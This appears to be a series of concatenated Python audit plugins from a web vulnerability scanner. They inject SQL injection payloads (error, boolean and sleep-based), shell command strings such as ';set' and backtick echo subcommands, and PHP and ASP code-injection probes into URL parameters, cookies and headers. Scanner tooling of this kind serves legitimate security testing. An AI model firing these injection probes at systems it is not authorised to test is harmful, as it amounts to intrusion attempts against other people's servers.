def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return if "Warning" in resp_str and "array given" in resp_str: out.success(url, self.name) for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) del data[k] data[k + "[]"] = v try: _ = prepare_url(netloc, params=data) r = requests.get(_, headers=headers) if "Warning" in r.text and "array given" in r.text: out.success(_, self.name) except: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = [url] for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) for k, v in params.items(): if k.lower() in ignoreParams: continue if not re.search('^-?\d+(\.\d+)?$', v): continue data = copy.deepcopy(params) # 判断条件: # 1. -randint !== origin # 2. +randint-randint == origin payload1 = "{0}+{1}".format(v, random.randint(10, 100)) data[k] = payload1 url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html1 = r.text if fuzzy_equal(resp_str, html1, 0.97): continue payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100)) data[k] = payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text if fuzzy_equal(resp_str, html2, 0.8): msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format( k=k, v=v, v1=payload1, v2=payload2) # out.log(msg) out.success(link, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': # 从源码中获取更多链接 if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = [ "/**/and'{0}'='{1}'", "'and'{0}'='{1}", '"and"{0}"="{1}', ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for flag in sql_flag: # true page rand_str = random_str(2) payload1 = v + flag.format(rand_str, rand_str) data[k] = payload1 url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text radio = GetRatio(resp_str, html1) if radio < 0.88: continue # false page payload2 = v + flag.format(random_str(2), random_str(2)) data[k] = payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text radio = GetRatio(resp_str, html2) if radio < 0.78: msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format( k=k, v=v, v1=payload1, v2=payload2) # out.log(msg) out.success(url, self.name, payload=k, condition=msg, raw=[r.raw, r2.raw]) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc # cookie sql_flag = '鎈\'"\(' if headers and "cookie" in headers: cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE) del headers["cookie"] if cookies: for k, v in cookies.items(): cookie = copy.deepcopy(cookies) cookie[k] = v + sql_flag r = requests.get(url, headers, cookies=urlencode(cookie)) for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(r.text) if match: out.success(url, self.name, payload="cookie: {}={}".format( k, cookie[k]), dbms_type=dbms_type, raw=r.raw) break if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), dbms_type=dbms_type, raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = [ "'and(select+sleep({time})union/**/select+1)='", '"and(select+sleep({time})union/**/select+1)="', '/**/and(select+sleep({time})union/**/select+1)' ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for flag in sql_flag: # first request payload1 = flag.format(time=0) data[k] = v + payload1 url1 = prepare_url(netloc, params=data) _ = time.time() r = requests.get(url1, headers=headers) html1 = r.text elapsed = time.time() - _ # second request payload2 = flag.format(time=2) data[k] = v + payload2 _ = time.time() r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text elapsed2 = time.time() - _ if elapsed2 - elapsed > 1.5: msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format( k=k, v1=payload1, v2=payload2, time1=elapsed, time2=elapsed2) # out.log(msg) out.success(url, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return randint = random.randint(1000, 9000) url_flag = { "set|set&set": [ 'Path=[\s\S]*?PWD=', 'Path=[\s\S]*?PATHEXT=', 'Path=[\s\S]*?SHELL=', 'Path\x3d[\s\S]*?PWD\x3d', 'Path\x3d[\s\S]*?PATHEXT\x3d', 'Path\x3d[\s\S]*?SHELL\x3d', 'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=', 'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d', 'Non-authoritative\sanswer:\s+Name:\s*', 'Server:\s*.*?\nAddress:\s*' ], "echo `echo 6162983|base64`6162983".format(randint): [ "NjE2Mjk4Mwo=6162983" ] } for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for spli in ['', ';']: for flag, re_list in url_flag.items(): if spli == "": data[k] = flag else: data[k] = v + spli + flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text for rule in re_list: if re.search(rule, html1, re.I | re.S | re.M): out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return regx = 'Parse error: syntax error,.*?\sin\s' randint = random.randint(1, 256) verify_result = md5(str(randint).encode()) payloads = [ "print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='", "\";print(md5({}));$a=\"", "${{@print(md5({}))}}", "${{@print(md5({}))}}\\" ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for payload in payloads: if payload[0] == "p": data[k] = payload.format(randint) else: data[k] = v + payload.format(randint) url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text if verify_result in html1: out.success(url, self.name, payload="{}:{}".format(k, data[k])) break if re.search(regx, html1, re.I | re.S | re.M): out.success(url, self.name, payload="{}:{}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = get_links(resp_str, url, True) links.append(url) for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) sql_flag = '鎈\'"\(' for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(link, self.name, payload="{}={}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return randint1 = random.randint(10000, 90000) randint2 = random.randint(10000, 90000) randint3 = randint1 * randint2 payloads = [ 'response.write({}*{})'.format(randint1, randint2), '\'+response.write({}*{})+\''.format(randint1, randint2), '"response.write({}*{})+"'.format(randint1, randint2), ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for payload in payloads: if payload[0] == "": data[k] = payload else: data[k] = v + payload url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text if str(randint3) in html1: out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue if not re.search('^-?\d+(\.\d+)?$', v): continue data = copy.deepcopy(params) # 判断条件: # 1. -randint !== origin # 2. +randint-randint == origin payload1 = "{0}+{1}".format(v, random.randint(10, 100)) data[k] = payload1 url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text if fuzzy_equal(resp_str, html1, 0.87): continue payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100)) data[k] = payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text if fuzzy_equal(resp_str, html2, 0.8): msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format( k=k, v=v, v1=payload1, v2=payload2) out.success(url, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = urlparse(url) # 判断带有php或无后缀的 basepath = os.path.basename(p.path) if "." in basepath and ".php" not in basepath: return if "Warning" in resp_str and "array given" in resp_str: out.success(url, self.name) params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) del data[k] data[k + "[]"] = v try: _ = prepare_url(netloc, params=data) if Share.in_url(_): continue Share.add_url(_) r = requests.get(_, headers=headers) if "Warning" in r.text and "array given" in r.text: out.success(_, self.name) except: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = '鎈\'"\(' for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = [url] for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) sql_flag = [ "'and'{0}'='{1}", '"and"{0}"="{1}' ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for flag in sql_flag: # true page rand_str = random_str(2) payload1 = flag.format(rand_str, rand_str) data[k] = v + payload1 url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html1 = r.text radio = GetRatio(resp_str, html1) if radio < 0.88: # 相似度随手一设~ continue # false page payload2 = flag.format(random_str(2), random_str(2)) data[k] = v + payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text radio = GetRatio(resp_str, html2) if radio < 0.68: # 相似度随手设置 msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(k=k, v=v, v1=payload1, v2=payload2) # out.log(msg) out.success(link, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc # cookie exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return origin_len = len(resp_str) sql_flag = '鎈\'"\(' if headers and "cookie" in headers: cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE) tmp_headers = copy.deepcopy(headers) del tmp_headers["cookie"] if cookies: for k, v in cookies.items(): cookie = copy.deepcopy(cookies) cookie[k] = v + sql_flag r = requests.get(url, headers=tmp_headers, cookies=urlencode(cookie)) if origin_len == len(r.text): continue for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(r.text) if match: out.success(url, self.name, payload="cookie: {}={}".format( k, cookie[k]), dbms_type=dbms_type, raw=r.raw) break if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), dbms_type=dbms_type, raw=r.raw, errinfo=match.group()) break # test header if headers: sql_flag = '\'"\(' new_headers = { "User-Agent": headers.get("User-Agent", "") + sql_flag, "referer": headers.get("referer", url) + sql_flag, "x-forwarded-for": headers.get("x-forwarded-for", "127.0.0.1") + sql_flag, "via": headers.get("via", "") + sql_flag } r = requests.get(url, headers=new_headers) html = r.text if origin_len == len(html): return for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, type="header inject", dbms_type=dbms_type, raw=r.raw, errinfo=match.group()) break